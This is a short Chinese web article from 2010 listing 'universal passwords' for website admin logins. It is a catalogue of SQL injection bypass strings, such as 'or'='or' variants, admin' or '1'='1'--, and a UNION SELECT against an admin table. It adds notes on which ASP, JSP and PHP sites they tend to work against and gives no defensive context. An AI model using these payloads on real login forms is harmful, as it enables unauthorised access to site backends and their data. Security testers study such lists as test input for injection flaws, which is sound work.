网站后台“万能密码” 'or'='or' 的总结
发布日期:2010-07-01 15:28:00
浏览次数:2209
文章作者:Nuclear'Atk
网友评论:2 评论
最后修改:2013-07-15 08:42:36
   各种利用形式如下: 'or'='or' 'or''=' 'or ''=' " or "a"="a "or "a"="a "or 1=1-- "or 1=1%00 "or"="a'='a "or=or" ') or ('a'='a ')or('a'='a 1 or '1'='1' or 1=1 1 or '1'='1'=1 1'or'1'='1 admin' or 'a'='a 密码随便 admin'or'1'='1'-- admin' or '1'='1'-- a'or' 1=1-- a 'or' 1=1-- or 1=1-- 'or 1=1-- 'or' '1'='1 or 1=1-- ' 'OR 1=1%00 or 'a'='a 'or'='1' 'or''=''or''=' ' or ''=''or''=' 'or'1'='1 ' or '1'='1 'or'a'='a ' or 'a'='a 'xor 用户名: ' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin)密码: 1 特殊说明: 1.admin ' or ' membership/login.asp(国外某程序) 2.admin 1'or'1'='1 用于jsp程序,如果管理员有admin这个用户,有一定成功率。 3.存在字符型注入的php网站是可以用万能密码' or 1=1/*的(某文章提到过) |
|
|
